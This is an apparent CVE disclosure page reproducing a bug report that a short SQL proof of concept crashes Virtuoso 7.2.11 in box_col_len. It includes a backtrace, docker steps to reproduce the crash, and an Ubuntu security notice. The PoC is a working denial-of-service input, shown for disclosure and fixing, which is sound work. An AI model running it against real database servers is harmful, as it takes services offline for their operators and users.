CVE-2023-48950: Fuzzer: Virtuoso 7.2.11 crashed at box_col_len · Issue #1174 · openlink/virtuoso-opensource

An issue in the box_col_len function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.


The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 nvarchar ) ;
INSERT INTO v0 VALUES ( 1 ) ;
INSERT INTO v0 SELECT MAX ( DISTINCT v1 ) FROM v0 ;
INSERT INTO v0 SELECT v1 FROM v0 WHERE ( SELECT ( SELECT v1 FROM v0 ) ) ;

backtrace:

#0 0x86df90 (box_col_len+0x90)
#1 0x88c0af (key_vec_insert+0x9df)
#2 0x7b679b (insert_node_run+0x8fb)
#3 0x7b6b1c (insert_node_input+0x11c)
#4 0x7af05e (qn_input+0x3ce)
#5 0x7af78f (qn_ts_send_output+0x23f)
#6 0x7b509e (table_source_input+0x16ee)
#7 0x7af05e (qn_input+0x3ce)
#8 0x7af4c6 (qn_send_output+0x236)
#9 0x8214bd (set_ctr_vec_input+0x99d)
#10 0x7af05e (qn_input+0x3ce)
#11 0x7c1be9 (qr_dml_array_exec+0x839)
#12 0x7ce602 (sf_sql_execute+0x15d2)
#13 0x7cecde (sf_sql_execute_w+0x17e)
#14 0x7d799d (sf_sql_execute_wrapper+0x3d)
#15 0xe214bc (future_wrapper+0x3fc)
#16 0xe28dbe (_thread_boot+0x11e)
#17 0x7ff3d19ba609 (start_thread+0xd9)
#18 0x7ff3d178a133 (clone+0x43)

Ways to reproduce (write the PoC to the file /tmp/test.sql first):

# remove any old container with the same name
docker container rm virtdb_test -f
# start Virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait for the server to start
sleep 10
# check whether a simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the PoC
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba

Related news

Ubuntu Security Notice USN-6879-1

Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.
